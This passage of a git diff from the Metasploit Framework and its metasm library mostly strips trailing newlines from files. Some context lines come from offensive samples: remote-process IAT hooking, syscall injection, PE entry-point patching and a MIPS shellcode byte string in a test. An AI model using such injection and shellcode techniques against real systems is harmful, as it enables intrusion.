b/lib/metasm/metasm/render.rb index 634851e319..2a0c2177b0 100644 --- a/lib/metasm/metasm/render.rb +++ b/lib/metasm/metasm/render.rb @@ -74,4 +74,4 @@ class Expression [l, op, r].compact end end -end +end \ No newline at end of file diff --git a/lib/metasm/misc/cheader-findpppath.rb b/lib/metasm/misc/cheader-findpppath.rb index ff4161039b..98502f0ac5 100644 --- a/lib/metasm/misc/cheader-findpppath.rb +++ b/lib/metasm/misc/cheader-findpppath.rb @@ -55,4 +55,4 @@ def parse(root=false) end $srch = ARGV.shift -puts parse +puts parse \ No newline at end of file diff --git a/lib/metasm/misc/hexdiff.rb b/lib/metasm/misc/hexdiff.rb index 1ac7584024..2e8fa1aef2 100644 --- a/lib/metasm/misc/hexdiff.rb +++ b/lib/metasm/misc/hexdiff.rb @@ -71,4 +71,4 @@ loop do raise 'nomatch..' } end -end +end \ No newline at end of file diff --git a/lib/metasm/misc/hexdump.rb b/lib/metasm/misc/hexdump.rb index 19cc278851..d102b8c39b 100644 --- a/lib/metasm/misc/hexdump.rb +++ b/lib/metasm/misc/hexdump.rb @@ -33,4 +33,4 @@ end if $0 == __FILE__ File.open(ARGV.first, 'rb') { |fd| fd.read }.hexdump -end +end \ No newline at end of file diff --git a/lib/metasm/misc/metasm-all.rb b/lib/metasm/misc/metasm-all.rb index 144b512d6c..5f917e4932 100644 --- a/lib/metasm/misc/metasm-all.rb +++ b/lib/metasm/misc/metasm-all.rb @@ -7,4 +7,4 @@ require 'metasm' require 'metasm-shell' require 'pp' -include Metasm +include Metasm \ No newline at end of file diff --git a/lib/metasm/misc/objdiff.rb b/lib/metasm/misc/objdiff.rb index 9f0a7291f3..2902d91e0e 100644 --- a/lib/metasm/misc/objdiff.rb +++ b/lib/metasm/misc/objdiff.rb @@ -44,4 +44,4 @@ def Object.diff(o1, o2) else [o1, o2] end -end +end \ No newline at end of file diff --git a/lib/metasm/misc/objscan.rb b/lib/metasm/misc/objscan.rb index 380bde30c4..1861d0a3a1 100644 --- a/lib/metasm/misc/objscan.rb +++ b/lib/metasm/misc/objscan.rb @@ -30,4 +30,4 @@ class Object end } end -end +end \ No newline at end of file diff --git a/lib/metasm/samples/a.out.rb b/lib/metasm/samples/a.out.rb index 272398e3d8..5590871648 100644 --- a/lib/metasm/samples/a.out.rb +++ b/lib/metasm/samples/a.out.rb @@ -28,4 +28,4 @@ mov eax, 1 mov ebx, 42 int 80h // linux sys_exit ret -EOS +EOS \ No newline at end of file diff --git a/lib/metasm/samples/asmsyntax.rb b/lib/metasm/samples/asmsyntax.rb index bf8788b468..34d313546c 100644 --- a/lib/metasm/samples/asmsyntax.rb +++ b/lib/metasm/samples/asmsyntax.rb @@ -46,4 +46,4 @@ edata.patch 'pre_pad', 'post_pad', newdata # replace the (beginning of the) seg edata.fixup 'kikoo' => 8, 'lol' => 42 # fixup the immediate values -p edata.data # show the resulting raw string +p edata.data # show the resulting raw string \ No newline at end of file diff --git a/lib/metasm/samples/compilation-steps.rb b/lib/metasm/samples/compilation-steps.rb index 83f5ccb30e..32c4ffa7a5 100644 --- a/lib/metasm/samples/compilation-steps.rb +++ b/lib/metasm/samples/compilation-steps.rb @@ -18,4 +18,4 @@ puts cp, '', ' ----', '' cp = Metasm::C::Parser.parse src cpu = Metasm::Ia32.new cpu.generate_PIC = false -puts cpu.new_ccompiler(cp).compile +puts cpu.new_ccompiler(cp).compile \ No newline at end of file diff --git a/lib/metasm/samples/cparser_makestackoffset.rb b/lib/metasm/samples/cparser_makestackoffset.rb index 4079c9b383..bffa808eac 100644 --- a/lib/metasm/samples/cparser_makestackoffset.rb +++ b/lib/metasm/samples/cparser_makestackoffset.rb @@ -52,4 +52,4 @@ puts 'end' else # dump the full parsed header puts cp.lexer.dump_macros(cp.lexer.definition.keys, false), '', '', cp -end +end \ No newline at end of file diff --git a/lib/metasm/samples/dasm-backtrack.rb b/lib/metasm/samples/dasm-backtrack.rb index 66b321c90f..a7d2f75b44 100644 --- a/lib/metasm/samples/dasm-backtrack.rb +++ b/lib/metasm/samples/dasm-backtrack.rb @@ -32,4 +32,4 @@ db 0e9h toto: mov eax, 28h -EOS +EOS \ No newline at end of file diff --git a/lib/metasm/samples/dasmnavig.rb b/lib/metasm/samples/dasmnavig.rb index b885817a9f..6c2c79a4a7 100644 --- a/lib/metasm/samples/dasmnavig.rb +++ b/lib/metasm/samples/dasmnavig.rb @@ -315,4 +315,4 @@ end if $0 == __FILE__ and not ARGV.delete '--reload' Viewer.new(ARGF.read).main_loop -end +end \ No newline at end of file diff --git a/lib/metasm/samples/disassemble-gtk.rb b/lib/metasm/samples/disassemble-gtk.rb index 23b54b8c1a..d82df15adb 100644 --- a/lib/metasm/samples/disassemble-gtk.rb +++ b/lib/metasm/samples/disassemble-gtk.rb @@ -51,4 +51,4 @@ ep = ARGV.map { |arg| (?0..?9).include?(arg[0]) ? Integer(arg) : arg } w = Metasm::GtkGui::MainWindow.new("#{exename} - metasm disassembler").display(dasm, ep) w.dasm_widget.focus_addr ep.first if not ep.empty? w.signal_connect('destroy') { Gtk.main_quit } -Gtk.main +Gtk.main \ No newline at end of file diff --git a/lib/metasm/samples/disassemble.rb b/lib/metasm/samples/disassemble.rb index b0c11b3484..5e5a214b2f 100644 --- a/lib/metasm/samples/disassemble.rb +++ b/lib/metasm/samples/disassemble.rb @@ -88,4 +88,4 @@ todate = proc { |f| end } -puts "durations\n load #{todate[t1-t0]}\n dasm #{todate[t2-t1]}\n output #{todate[t3-t2]}\n total #{todate[t3-t0]}" if opts[:benchmark] +puts "durations\n load #{todate[t1-t0]}\n dasm #{todate[t2-t1]}\n output #{todate[t3-t2]}\n total #{todate[t3-t0]}" if opts[:benchmark] \ No newline at end of file diff --git a/lib/metasm/samples/dump_upx.rb b/lib/metasm/samples/dump_upx.rb index 991fc64a65..d961710cde 100644 --- a/lib/metasm/samples/dump_upx.rb +++ b/lib/metasm/samples/dump_upx.rb @@ -87,4 +87,4 @@ end if __FILE__ == $0 UPXUnpacker.new(ARGV.shift, ARGV.shift) -end +end \ No newline at end of file diff --git a/lib/metasm/samples/elf_list_needed.rb b/lib/metasm/samples/elf_list_needed.rb index af33c33c83..bd2797e829 100644 --- a/lib/metasm/samples/elf_list_needed.rb +++ b/lib/metasm/samples/elf_list_needed.rb @@ -43,4 +43,4 @@ while src = todo.shift todo << File.join(path, dep) end } -end +end \ No newline at end of file diff --git a/lib/metasm/samples/elf_listexports.rb b/lib/metasm/samples/elf_listexports.rb index a5d7e49b1f..22ec9cd2a5 100644 --- a/lib/metasm/samples/elf_listexports.rb +++ b/lib/metasm/samples/elf_listexports.rb @@ -26,4 +26,4 @@ ARGV.each { |f| line << s } puts line if not line.empty? -} +} \ No newline at end of file diff --git a/lib/metasm/samples/elfencode-c.rb b/lib/metasm/samples/elfencode-c.rb index 75d229c5b2..523a468294 100644 --- a/lib/metasm/samples/elfencode-c.rb +++ b/lib/metasm/samples/elfencode-c.rb @@ -18,5 +18,4 @@ int main(void) { printf("Hello, %s !\n", "world"); exit(0x28); -} - +} \ No newline at end of file diff --git a/lib/metasm/samples/elfencode.rb b/lib/metasm/samples/elfencode.rb index dac7e84b2c..afa2e74343 100644 --- a/lib/metasm/samples/elfencode.rb +++ b/lib/metasm/samples/elfencode.rb @@ -40,5 +40,4 @@ metasm_intern_geteip: 1: pop eax add eax, metasm_intern_geteip - 1b - ret - + ret \ No newline at end of file diff --git a/lib/metasm/samples/factorize-headers-peimports.rb b/lib/metasm/samples/factorize-headers-peimports.rb index daece72302..a1acd0cf2a 100644 --- a/lib/metasm/samples/factorize-headers-peimports.rb +++ b/lib/metasm/samples/factorize-headers-peimports.rb @@ -85,4 +85,4 @@ parser.parse 'void *fnptr[] = { ' + funcnames.map { |f| '&'+f }.join(', ') + ' } outfd = (opts[:outfile] ? File.open(opts[:outfile], 'w') : $stdout) outfd.puts parser.factorize_final -outfd.close +outfd.close \ No newline at end of file diff --git a/lib/metasm/samples/factorize-headers.rb b/lib/metasm/samples/factorize-headers.rb index 1d132c78db..2f0f7995f8 100644 --- a/lib/metasm/samples/factorize-headers.rb +++ b/lib/metasm/samples/factorize-headers.rb @@ -38,5 +38,4 @@ end # to trace only pp macros (using eg an asm source), use Preprocessor#factorize instead -puts Ia32.new.new_cparser.factorize(stub + File.read(file)) - +puts Ia32.new.new_cparser.factorize(stub + File.read(file)) \ No newline at end of file diff --git a/lib/metasm/samples/lindebug.rb b/lib/metasm/samples/lindebug.rb index 2426856f7e..53306a0923 100644 --- a/lib/metasm/samples/lindebug.rb +++ b/lib/metasm/samples/lindebug.rb @@ -784,4 +784,4 @@ if $0 == __FILE__ end LinDebug.new(Rubstop.new(ARGV.join(' '))).main_loop -end +end \ No newline at end of file diff --git a/lib/metasm/samples/linux_injectsyscall.rb b/lib/metasm/samples/linux_injectsyscall.rb index 94156d10ae..f164379bff 100644 --- a/lib/metasm/samples/linux_injectsyscall.rb +++ b/lib/metasm/samples/linux_injectsyscall.rb @@ -64,4 +64,4 @@ end if $0 == __FILE__ SyscallHooker.new(ARGV.shift.to_i).inject('write', 2, "testic\n", 7) -end +end \ No newline at end of file diff --git a/lib/metasm/samples/pe-hook.rb b/lib/metasm/samples/pe-hook.rb index a928547558..5307120e4a 100644 --- a/lib/metasm/samples/pe-hook.rb +++ b/lib/metasm/samples/pe-hook.rb @@ -66,4 +66,4 @@ pe.sections << s pe.optheader.entrypoint = 'hook_entrypoint' # save -pe.encode_file(target.sub(/\.exe$/i, '-patch.exe')) +pe.encode_file(target.sub(/\.exe$/i, '-patch.exe')) \ No newline at end of file diff --git a/lib/metasm/samples/pe-ia32-cpuid.rb b/lib/metasm/samples/pe-ia32-cpuid.rb index add373b1b5..b275e82be0 100644 --- a/lib/metasm/samples/pe-ia32-cpuid.rb +++ b/lib/metasm/samples/pe-ia32-cpuid.rb @@ -200,4 +200,4 @@ int main(void) printf("\n brandstring: \"%.48s\"\n", brandstring); return 0; -} +} \ No newline at end of file diff --git a/lib/metasm/samples/pe-mips.rb b/lib/metasm/samples/pe-mips.rb index 30d0c124f9..0f368f16a5 100644 --- a/lib/metasm/samples/pe-mips.rb +++ b/lib/metasm/samples/pe-mips.rb @@ -31,5 +31,4 @@ nop .import 'foobar' 'baz' EOS prog.header.machine='R4000' -data = prog.encode_file 'mipspe.exe' - +data = prog.encode_file 'mipspe.exe' \ No newline at end of file diff --git a/lib/metasm/samples/pe-shutdown.rb b/lib/metasm/samples/pe-shutdown.rb index d9e00bdb02..293a1e3810 100644 --- a/lib/metasm/samples/pe-shutdown.rb +++ b/lib/metasm/samples/pe-shutdown.rb @@ -75,4 +75,4 @@ struct _TOKEN_PRIVILEGES { }; typedef struct _TOKEN_PRIVILEGES *PTOKEN_PRIVILEGES; typedef struct _TOKEN_PRIVILEGES TOKEN_PRIVILEGES; -BOOL AdjustTokenPrivileges __attribute__((dllimport)) __attribute__((stdcall))(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength); +BOOL AdjustTokenPrivileges __attribute__((dllimport)) __attribute__((stdcall))(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength); \ No newline at end of file diff --git a/lib/metasm/samples/pe-testrelocs.rb b/lib/metasm/samples/pe-testrelocs.rb index 40d00c567a..b728f61c4d 100644 --- a/lib/metasm/samples/pe-testrelocs.rb +++ b/lib/metasm/samples/pe-testrelocs.rb @@ -48,4 +48,4 @@ title db 'bar', 0 .export foobar .libname 'pe-foolib' EOS -dll.encode_file('pe-foolib.dll', 'dll') +dll.encode_file('pe-foolib.dll', 'dll') \ No newline at end of file diff --git a/lib/metasm/samples/pe-testrsrc.rb b/lib/metasm/samples/pe-testrsrc.rb index 452e974a18..4c50097def 100644 --- a/lib/metasm/samples/pe-testrsrc.rb +++ b/lib/metasm/samples/pe-testrsrc.rb @@ -21,4 +21,4 @@ EOS rsrc = { 1 => { 1 => { 2 => 'xxx' }, 'toto' => { 12 => 'tata' } } } pe.resource = Metasm::COFF::ResourceDirectory.from_hash rsrc -pe.encode_file('pe-testrsrc.exe') +pe.encode_file('pe-testrsrc.exe') \ No newline at end of file diff --git a/lib/metasm/samples/pe_listexports.rb b/lib/metasm/samples/pe_listexports.rb index f859364212..73ddcf3d66 100644 --- a/lib/metasm/samples/pe_listexports.rb +++ b/lib/metasm/samples/pe_listexports.rb @@ -28,4 +28,4 @@ ARGV.each { |f| line << e } puts line if not line.empty? -} +} \ No newline at end of file diff --git a/lib/metasm/samples/preprocess-flatten.rb b/lib/metasm/samples/preprocess-flatten.rb index 835179e2ce..607fde841f 100644 --- a/lib/metasm/samples/preprocess-flatten.rb +++ b/lib/metasm/samples/preprocess-flatten.rb @@ -16,4 +16,4 @@ p = Metasm::Preprocessor.new p.feed(ARGF.read) raw = p.dump puts p.dump_macros(p.definition.keys, false) -puts raw +puts raw \ No newline at end of file diff --git a/lib/metasm/samples/rubstop.rb b/lib/metasm/samples/rubstop.rb index b1ec1a5c25..4c8d82dc16 100644 --- a/lib/metasm/samples/rubstop.rb +++ b/lib/metasm/samples/rubstop.rb @@ -318,4 +318,4 @@ if $0 == __FILE__ puts 'interrupted!' rescue Errno::ESRCH end -end +end \ No newline at end of file diff --git a/lib/metasm/samples/scan_pt_gnu_stack.rb b/lib/metasm/samples/scan_pt_gnu_stack.rb index b92c2a1d0d..a4dc4ccb53 100644 --- a/lib/metasm/samples/scan_pt_gnu_stack.rb +++ b/lib/metasm/samples/scan_pt_gnu_stack.rb @@ -51,4 +51,4 @@ iter = proc { |f| # go ARGV.each { |dir| iter[dir] } -_printadv '' +_printadv '' \ No newline at end of file diff --git a/lib/metasm/samples/scanpeexports.rb b/lib/metasm/samples/scanpeexports.rb index 3ec1d4af24..01bd63f895 100644 --- a/lib/metasm/samples/scanpeexports.rb +++ b/lib/metasm/samples/scanpeexports.rb @@ -59,4 +59,4 @@ iter[base, match] if RUBY_PLATFORM =~ /win32/i _puts "press [enter] to exit" gets -end +end \ No newline at end of file diff --git a/lib/metasm/samples/shellcode-c.rb b/lib/metasm/samples/shellcode-c.rb index 60e9b7a232..95a6f41d85 100644 --- a/lib/metasm/samples/shellcode-c.rb +++ b/lib/metasm/samples/shellcode-c.rb @@ -37,4 +37,4 @@ sc.assemble sc.encode_file 'shellcode.raw' -puts Metasm::Shellcode.load_file('shellcode.raw', Metasm::Ia32.new).disassemble +puts Metasm::Shellcode.load_file('shellcode.raw', Metasm::Ia32.new).disassemble \ No newline at end of file diff --git a/lib/metasm/samples/testpe.rb b/lib/metasm/samples/testpe.rb index 9e0fa37aa6..0ffa24eb2a 100644 --- a/lib/metasm/samples/testpe.rb +++ b/lib/metasm/samples/testpe.rb @@ -29,4 +29,4 @@ ret message db 'kikoo lol', 0 title db 'blaaa', 0 EOS -pe.encode_file 'testpe.exe' +pe.encode_file 'testpe.exe' \ No newline at end of file diff --git a/lib/metasm/samples/testraw.rb b/lib/metasm/samples/testraw.rb index 1836e924e4..a76728db82 100644 --- a/lib/metasm/samples/testraw.rb +++ b/lib/metasm/samples/testraw.rb @@ -42,4 +42,4 @@ puts "running" system './test-testraw' puts "done" #File.unlink 'test-testraw' -File.unlink 'test-testraw.c' +File.unlink 'test-testraw.c' \ No newline at end of file diff --git a/lib/metasm/samples/win32hooker-advanced.rb b/lib/metasm/samples/win32hooker-advanced.rb index 63509baa94..5a9f0412e4 100644 --- a/lib/metasm/samples/win32hooker-advanced.rb +++ b/lib/metasm/samples/win32hooker-advanced.rb @@ -169,4 +169,4 @@ hooks.each { |addr, edata| puts 'done' -WinAPI.closehandle(handle) +WinAPI.closehandle(handle) \ No newline at end of file diff --git a/lib/metasm/samples/win32hooker.rb b/lib/metasm/samples/win32hooker.rb index 8a7878201f..8982aad034 100644 --- a/lib/metasm/samples/win32hooker.rb +++ b/lib/metasm/samples/win32hooker.rb @@ -97,4 +97,4 @@ iat_h = pe.encode_xword(injected).data remote_mem[target_p, iat_h.length] = iat_h # done -WinAPI.closehandle(handle) +WinAPI.closehandle(handle) \ No newline at end of file diff --git a/lib/metasm/samples/win32livedasm.rb b/lib/metasm/samples/win32livedasm.rb index 3ec2c21374..03ddb2e25d 100644 --- a/lib/metasm/samples/win32livedasm.rb +++ b/lib/metasm/samples/win32livedasm.rb @@ -33,4 +33,4 @@ eip = baseaddr + pe.label_rva(pe.optheader.entrypoint) String.cpu.make_call_return # String.cpu is the Ia32 cpu set up by metasm-shell # disassemble & dump opcodes -puts pe.encoded[pe.optheader.entrypoint, 0x100].data.decode(eip) +puts pe.encoded[pe.optheader.entrypoint, 0x100].data.decode(eip) \ No newline at end of file diff --git a/lib/metasm/samples/wintrace.rb b/lib/metasm/samples/wintrace.rb index 7b011e52e0..1458b4dd7d 100644 --- a/lib/metasm/samples/wintrace.rb +++ b/lib/metasm/samples/wintrace.rb @@ -85,4 +85,4 @@ end if $0 == __FILE__ Metasm::WinAPI.get_debug_privilege Tracer.new ARGV.shift.dup -end +end \ No newline at end of file diff --git a/lib/metasm/tests/all.rb b/lib/metasm/tests/all.rb index 9ad7b6159f..697db3e6b7 100644 --- a/lib/metasm/tests/all.rb +++ b/lib/metasm/tests/all.rb @@ -4,5 +4,4 @@ # Licence is LGPL, see LICENCE in the top-level directory -Dir['tests/*.rb'].each { |f| require f } - +Dir['tests/*.rb'].each { |f| require f } \ No newline at end of file diff --git a/lib/metasm/tests/encodeddata.rb b/lib/metasm/tests/encodeddata.rb index 28c5c83d25..84a075853e 100644 --- a/lib/metasm/tests/encodeddata.rb +++ b/lib/metasm/tests/encodeddata.rb @@ -129,4 +129,4 @@ abc: EOS assert_equal(12*4, eee.data[0]) end -end +end \ No newline at end of file diff --git a/lib/metasm/tests/mips.rb b/lib/metasm/tests/mips.rb index c212dda4b6..d54e8753cc 100644 --- a/lib/metasm/tests/mips.rb +++ b/lib/metasm/tests/mips.rb @@ -108,4 +108,4 @@ loop: EOS assert_equal("\x24\x0e\xff\xfb\x01\xc0\x70\x27\x24\x0b\xff\xb7\x05\x10\xff\xff\x28\x08\x82\x82\x01\x60\x58\x27\x03\xeb\xc8\x21\x28\x17\x82\x82\x8f\x31\xff\xfc\x24\x0d\xff\xfb\x01\xa0\x68\x27\x21\xaf\xff\xfd\x8f\x28\xff\xfc\x02\xef\xb8\x21\x01\x11\x18\x26\x02\xee\xf0\x2b\xaf\x23\xff\xfc\x21\xa6\xff\xff\x17\xc0\xff\xf9\x03\x2d\xc8\x21\x24\x02\x10\x33\x01\x4a\x54\x0c\0\0\0\0", sc.encoded.data) end -end +end \ No newline at end of file diff --git a/lib/metasm/tests/preprocessor.rb b/lib/metasm/tests/preprocessor.rb index 15b5e225cb..8597cad447 100644 --- a/lib/metasm/tests/preprocessor.rb +++ b/lib/metasm/tests/preprocessor.rb @@ -245,5 +245,4 @@ EOS t_float['0x.p1'] t_float['0x.1lp1'] end -end - +end \ No newline at end of file diff --git a/lib/msf/base.rb b/lib/msf/base.rb index 185b6944fd..00b2a7cf0c 100644 --- a/lib/msf/base.rb +++ b/lib/msf/base.rb @@ -32,4 +32,4 @@ require 'msf/base/sessions/command_shell' require 'msf/base/serializer/readable_text' # Persistent Storage -require 'msf/base/persistent_storage' +require 'msf/base/persistent_storage' \ No newline at end of file diff --git a/lib/msf/base.rb.ts.rb b/lib/msf/base.rb.ts.rb index d6d4c501c8..64e5ee23c0 100644 --- a/lib/msf/base.rb.ts.rb +++ b/lib/msf/base.rb.ts.rb @@ -18,4 +18,4 @@ class TestSuite end end -end +end \ No newline at end of file diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index f39cb36602..ebffbaa831 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -281,4 +281,4 @@ class Config < Hash end -end +end \ No newline at end of file diff --git a/lib/msf/base/logging.rb b/lib/msf/base/logging.rb index 6f626d87c3..ab847b26ab 100644 --- a/lib/msf/base/logging.rb +++ b/lib/msf/base/logging.rb @@ -89,4 +89,4 @@ class Logging end -end +end \ No newline at end of file diff --git a/lib/msf/base/persistent_storage.rb b/lib/msf/base/persistent_storage.rb index c1138464ee..795f720915 100644 --- a/lib/msf/base/persistent_storage.rb +++ b/lib/msf/base/persistent_storage.rb @@ -66,4 +66,4 @@ end end -require 'msf/base/persistent_storage/flatfile' +require 'msf/base/persistent_storage/flatfile' \ No newline at end of file diff --git a/lib/msf/base/persistent_storage/flatfile.rb b/lib/msf/base/persistent_storage/flatfile.rb index 663d5d50cc..7c319bb811 100644 --- a/lib/msf/base/persistent_storage/flatfile.rb +++ b/lib/msf/base/persistent_storage/flatfile.rb @@ -57,4 +57,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 0890582d8e..c06cc595cf 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -429,4 +429,4 @@ class ReadableText end -end end +end end \ No newline at end of file diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index 6c77e78836..b94b419122 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -83,4 +83,4 @@ class CommandShell end end -end +end \ No newline at end of file diff --git a/lib/msf/base/sessions/command_shell.rb.ut.rb b/lib/msf/base/sessions/command_shell.rb.ut.rb index 7c45d33afa..1e4b8d3dfa 100644 --- a/lib/msf/base/sessions/command_shell.rb.ut.rb +++ b/lib/msf/base/sessions/command_shell.rb.ut.rb @@ -6,4 +6,4 @@ require 'msf/base' class Msf::Sessions::CommandShell::UnitTest < Test::Unit::TestCase def test_cmdshell end -end +end \ No newline at end of file diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index c19395669e..21267c7f41 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -224,4 +224,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/base/sessions/vncinject.rb b/lib/msf/base/sessions/vncinject.rb index 3c9617f825..7274e13e49 100644 --- a/lib/msf/base/sessions/vncinject.rb +++ b/lib/msf/base/sessions/vncinject.rb @@ -165,4 +165,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple.rb b/lib/msf/base/simple.rb index fbbea7e8b9..ece24377e8 100644 --- a/lib/msf/base/simple.rb +++ b/lib/msf/base/simple.rb @@ -11,4 +11,4 @@ require 'msf/base/simple/payload' require 'msf/base/simple/auxiliary' # Simplified framework interface -require 'msf/base/simple/framework' +require 'msf/base/simple/framework' \ No newline at end of file diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb index 83146b3ed8..9fc29101a5 100644 --- a/lib/msf/base/simple/auxiliary.rb +++ b/lib/msf/base/simple/auxiliary.rb @@ -116,4 +116,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index efe4aa0ed5..1914f8ec1b 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -65,4 +65,4 @@ module Buffer end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/encoder.rb b/lib/msf/base/simple/encoder.rb index 4ec756cc69..29eed3834c 100644 --- a/lib/msf/base/simple/encoder.rb +++ b/lib/msf/base/simple/encoder.rb @@ -12,4 +12,4 @@ module Encoder end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index f3d07a40ea..50504db0f5 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -177,4 +177,4 @@ module Exploit end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb index eb3abb87cc..1406499bf4 100644 --- a/lib/msf/base/simple/framework.rb +++ b/lib/msf/base/simple/framework.rb @@ -178,4 +178,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/module.rb b/lib/msf/base/simple/module.rb index c4fa7e3983..94d53ec26f 100644 --- a/lib/msf/base/simple/module.rb +++ b/lib/msf/base/simple/module.rb @@ -49,4 +49,4 @@ module Module end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/nop.rb b/lib/msf/base/simple/nop.rb index 4e1d3974f8..03e94be4e9 100644 --- a/lib/msf/base/simple/nop.rb +++ b/lib/msf/base/simple/nop.rb @@ -38,4 +38,4 @@ module Nop end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index a28bdaf3ae..4a94761c62 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -95,4 +95,4 @@ module Payload end end -end +end \ No newline at end of file diff --git a/lib/msf/base/simple/statistics.rb b/lib/msf/base/simple/statistics.rb index 2cec55d402..19e56853ff 100644 --- a/lib/msf/base/simple/statistics.rb +++ b/lib/msf/base/simple/statistics.rb @@ -85,4 +85,4 @@ class Statistics end end -end +end \ No newline at end of file diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 525400fa2e..a936a79e1d 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -51,4 +51,4 @@ require 'msf/core/payload' require 'msf/core/auxiliary' # Drivers -require 'msf/core/exploit_driver' +require 'msf/core/exploit_driver' \ No newline at end of file diff --git a/lib/msf/core.rb.ts.rb b/lib/msf/core.rb.ts.rb index 51876eddc0..410570a4b5 100644 --- a/lib/msf/core.rb.ts.rb +++ b/lib/msf/core.rb.ts.rb @@ -40,4 +40,4 @@ class Msf::TestSuite return suite; end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary.rb b/lib/msf/core/auxiliary.rb index b43a8eba9d..b931d2c26a 100644 --- a/lib/msf/core/auxiliary.rb +++ b/lib/msf/core/auxiliary.rb @@ -179,4 +179,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary/dos.rb b/lib/msf/core/auxiliary/dos.rb index dba0dcae8d..f95296b6cb 100644 --- a/lib/msf/core/auxiliary/dos.rb +++ b/lib/msf/core/auxiliary/dos.rb @@ -12,4 +12,4 @@ module Auxiliary::Dos end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb index c2446e5308..fd732b2990 100644 --- a/lib/msf/core/auxiliary/report.rb +++ b/lib/msf/core/auxiliary/report.rb @@ -97,4 +97,4 @@ module Auxiliary::Report end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index 9c3edf6f46..73bd87eee7 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -324,4 +324,4 @@ def banner=(banner) end end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary/timed.rb b/lib/msf/core/auxiliary/timed.rb index 68ead226a3..826c407fa1 100644 --- a/lib/msf/core/auxiliary/timed.rb +++ b/lib/msf/core/auxiliary/timed.rb @@ -36,4 +36,4 @@ def run end end -end +end \ No newline at end of file diff --git a/lib/msf/core/auxiliary/wmapmodule.rb b/lib/msf/core/auxiliary/wmapmodule.rb index 86a321d3e4..d1203b3742 100644 --- a/lib/msf/core/auxiliary/wmapmodule.rb +++ b/lib/msf/core/auxiliary/wmapmodule.rb @@ -225,4 +225,4 @@ module Auxiliary::WMAPScanGeneric end end -end +end \ No newline at end of file diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index d79bc94cde..3e297fd3e4 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -65,4 +65,4 @@ LICENSES = BSD_LICENSE, ARTISTIC_LICENSE, UNKNOWN_LICENSE - ] + ] \ No newline at end of file diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 70892ea39e..0eceb30ec8 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -259,4 +259,4 @@ class ModuleDataStore < DataStore end -end +end \ No newline at end of file diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index e5fe711e43..de61567613 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -605,4 +605,4 @@ class DBManager end -end +end \ No newline at end of file diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 15a8e929d7..afb987c92a 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -75,4 +75,4 @@ class DBManager end end -end +end \ No newline at end of file diff --git a/lib/msf/core/db_objects.rb b/lib/msf/core/db_objects.rb index b08801f5f9..c73d3a9ec6 100644 --- a/lib/msf/core/db_objects.rb +++ b/lib/msf/core/db_objects.rb @@ -114,4 +114,4 @@ class Report < ::ActiveRecord::Base end end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 0ae6982038..9f6115475a 100644 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -340,4 +340,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 34cdc97ab2..78d405bee4 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -604,4 +604,4 @@ require 'msf/core/encoder/xor' require 'msf/core/encoder/xor_additive_feedback' require 